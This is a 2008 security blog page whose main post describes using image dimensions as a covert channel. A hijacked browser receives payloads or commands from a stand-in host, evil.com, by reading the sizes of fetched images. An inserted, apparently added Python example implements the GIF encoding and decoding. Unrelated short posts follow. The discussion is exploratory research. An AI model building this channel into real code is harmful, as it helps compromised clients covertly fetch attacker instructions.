I am a hacker and you are afraid and that makes you more dangerous than I ever could be.
Using Image Dimensions as a side channel
Topic: Technology
1:16 pm EST, Feb 14, 2008
Arshan over at Aspect posted something on his blog that sounds very familiar indeed.
Disclaimer: I know this isn’t earth-shattering now when the sandbox isn’t there, but I think it’s cool that using image tags we can create a completely covert channel for bypassing the same origin policy and control browsers remotely. Just to be clear, this is not a traditional same-origin bypass where we’re on http://evil.com/ and we’re talking to http://mybank.com/. We’re talking about a hijacked client who’s in collusion with an evil server that wants to deliver the client some message, be it a code payload, instructions, etc. Can we restrict JavaScript from dynamically loading image tags? No more image pre-loading? I doubt it!
Here’s how it works.
* Client dynamically creates an Image() and points the source to http://evil.com/evil.cgi?password=somesecret
* Server responds with an image that is 16 pixels tall and 1 pixel wide (16 represents in this phase the total length of the payload)
* Client then starts a loop that iterates 16/2 times:
  o Client dynamically creates a new Image() and points the source to http://evil.com/evil.cgi?password=somesecret&i=
  o The new image has height x, width y
  o Client appends ASCII character value of x onto payload string
  o Client appends ASCII character value of y onto payload string
* Client now has authenticated, 16-length payload to do whatever they want with
Hehe. I was wondering when someone would talk about this! John Terrill and I looked at this back in late 2006 / early 2007 and took this a little further than Arshan did. Here is what we came up with:
The carrying capacity of a side channel is an important factor. Arshan's solution is not very good because of its limited capacity: every image fetch costs a full HTTP request and response plus an image body, and carries only two bytes of payload, one per dimension. How can we use dimensions as a side channel without having to send tens of kilobytes to transfer a few bytes of data? That's the "$1,000,000 and a Monster Truck" question that started John and me researching.
Let's take GIF images. According to the spec, width and height are 16-bit integers, giving us 4 bytes of data per image. However, if I need to send 0xFFFFFFFF it would suck to have to transmit an image that is 65535x65535. That would be huge. But GIFs are compressed, right? Remember that JavaScript cannot access the pixel data of the Image objects it creates, so we really don't care what's in this picture. What if we make it all white? That should compress well. While it does, you are still sending ...
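The following is an added example, not code from this post or from Arshan's; it is my own Python for the two ideas above: Arshan's protocol (a first image that announces the length, then one image per chunk, dimensions read back on the client) and the 16-bit-per-dimension packing that gets roughly 4 bytes per GIF. It builds real all-white GIF89a files of the requested size and measures how many bytes cross the wire per payload byte. One edge case the posts do not mention: a width or height of 0 is not a valid image, so the payload is carried as base-65535 digits and each digit travels as dimension digit+1. The sample payloads are constructed; gif_dimensions() stands in for what the browser hands back as Image().width/height, since nothing here talks to a network. The LZW encoder is specialised to uniform pixels (it emits the same codes a general encoder would for an all-white image, but in O(codes) rather than O(pixels)), which is what makes the 65535x65535 case cheap to measure.

```python
import struct

BASE = 65535  # digit 0..65534 travels as dimension digit+1 (1..65535): no image is ever 0 pixels wide


def lzw_uniform(n_pixels, index=0, min_code_size=2):
    """GIF LZW stream for n_pixels pixels that all have colour `index`.

    Same bytes a general LZW encoder emits on uniform input: each code covers a run one pixel
    longer than the previous (1, 2, 3, ...), and a clear code resets the table when it fills.
    """
    clear, eoi = 1 << min_code_size, (1 << min_code_size) + 1
    out, acc, nbits = bytearray(), 0, 0

    def put(code, size):                       # GIF packs codes LSB-first into bytes
        nonlocal acc, nbits
        acc |= code << nbits
        nbits += size
        while nbits >= 8:
            out.append(acc & 0xFF)
            acc >>= 8
            nbits -= 8

    code_size, next_code, maxrun = min_code_size + 1, eoi + 1, 1
    put(clear, code_size)
    remaining = n_pixels
    while remaining > 0:
        run = min(maxrun, remaining)           # longest run the dictionary already knows
        remaining -= run
        put(index if run == 1 else eoi + run - 1, code_size)
        if remaining == 0:
            break
        if next_code == 4096:                  # dictionary full (12-bit codes): flush and restart
            put(clear, code_size)
            code_size, next_code, maxrun = min_code_size + 1, eoi + 1, 1
            continue
        if next_code == 1 << code_size and code_size < 12:
            code_size += 1                     # the decoder widens its codes at this same point
        next_code += 1                         # new entry: a run one pixel longer
        maxrun += 1
    if next_code == 1 << code_size and code_size < 12:
        code_size += 1                         # the decoder also bumps after the last data code
    put(eoi, code_size)
    if nbits:
        out.append(acc & 0xFF)
    return bytes(out)


def sub_blocks(data):
    """Wrap raw LZW bytes as GIF data sub-blocks: length byte, <=255 bytes, then a 0 terminator."""
    out = bytearray()
    for i in range(0, len(data), 255):
        out.append(len(data[i:i + 255]))
        out += data[i:i + 255]
    out.append(0)
    return bytes(out)


def build_gif(width, height):
    """Smallest valid all-white GIF89a of exactly width x height pixels (2-colour palette)."""
    if not (0 < width < 65536 and 0 < height < 65536):
        raise ValueError("GIF dimensions are unsigned 16-bit and must be non-zero")
    screen = struct.pack("<HHBBB", width, height, 0x80, 0, 0)    # global colour table, 2 entries
    palette = b"\xff\xff\xff\x00\x00\x00"                         # index 0 = white, 1 = black
    image = b"\x2c" + struct.pack("<HHHHB", 0, 0, width, height, 0)
    return (b"GIF89a" + screen + palette + image
            + bytes([2]) + sub_blocks(lzw_uniform(width * height)) + b"\x3b")


def gif_dimensions(data):
    """Receiving side: width/height from the logical screen descriptor (the image descriptor matches)."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    return struct.unpack_from("<HH", data, 6)


def payload_to_dims(payload):
    """Base-65535 digits, two per image; the first image announces the length (Arshan's protocol)."""
    if not 0 < len(payload) < BASE:
        raise ValueError("payload length must itself fit in one dimension")
    n, digits = int.from_bytes(payload, "big"), []
    while n:
        n, d = divmod(n, BASE)
        digits.append(d + 1)
    if len(digits) % 2:
        digits.append(1)                       # pad with digit 0 in the most significant place
    return [(len(payload) + 1, 1)] + [(digits[i], digits[i + 1]) for i in range(0, len(digits), 2)]


def dims_to_payload(dims):
    """Rebuild the payload from the (width, height) pairs the client observed."""
    length, n = dims[0][0] - 1, 0
    for d in reversed([d - 1 for w, h in dims[1:] for d in (w, h)]):
        n = n * BASE + d
    return n.to_bytes(length, "big")


def channel_cost(payload):
    """(payload bytes, GIF bytes on the wire, image count); HTTP headers not counted."""
    images = [build_gif(w, h) for w, h in payload_to_dims(payload)]
    return len(payload), sum(map(len, images)), len(images)


if __name__ == "__main__":
    secret = b"Hi"                             # constructed sample payload
    dims = payload_to_dims(secret)
    print(secret, "->", dims, "->", dims_to_payload([gif_dimensions(build_gif(w, h)) for w, h in dims]))
    print("cost (payload bytes, wire bytes, images):", channel_cost(secret))
    print("65535x65535 all-white GIF:", len(build_gif(65535, 65535)), "bytes")  # a few seconds of CPU
```

On the browser side the loop is the one Arshan describes: create an Image(), read img.width and img.height in its onload handler, and feed the (width, height) pairs to the same reconstruction as dims_to_payload(). The numbers show the capacity problem the post is circling: a two-byte secret already costs a couple of hundred bytes of GIF before any HTTP overhead, and the worst-case digit pair (a 65535x65535 all-white image) still compresses to close to 3 MB, because LZW on a uniform image only grows each run by one pixel per code and has to flush its dictionary every 4096 entries.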
Put people in a crazy situation and people do crazy things
You have no right to a lawyer, you have no right to witnesses. You don't really know what the charges are, and you certainly don't know what the secret evidence is against you.
It's not about left or right, it's about right and wrong.
HP Aims To Improve Software Management -- Hewlett-Packard -- InformationWeek
Topic: Miscellaneous
4:53 pm EST, Feb 6, 2008
Nine out of the world's top 11 security hackers came to HP through the SPI Dynamics acquisition, he boasts, although it's not immediately clear who ranked those top 11.
Just in case the world missed the memo.
... ... [sigh] I can't even think of what to say about this. Expressing oneself through charts is a good idea.
After we wrote the book, Addison Wesley sent Bryan and me some pre-paid FedEx envelopes so we could send signed copies of the book to the reviewers and editors. Our pal Vinnie Liu was a reviewer, but he had already come by our offices in Atlanta, where he received his signed copy.
This presented Caleb and me with a very interesting situation: we had a prepaid and pre-addressed FedEx envelope for Vinnie and nothing legitimate that we needed to send him.
What to do, what to do?
So we cut out the tracking number, cut out the return address, and we sent him a giant pickle.
No message. No Explanation. Just Pickle.
Beware friends beware. The pickle wars have begun!
This whole "SideJacking" meme is especially annoying and amusing to me. I've had people contact me (neither Robert nor Dave; mainly reporters and non-web infosec guys) asking my opinion on this dangerous attack. These are the same people who have also said to me in the past that XSS isn't interesting because it's just cookie theft and that's not very sexy.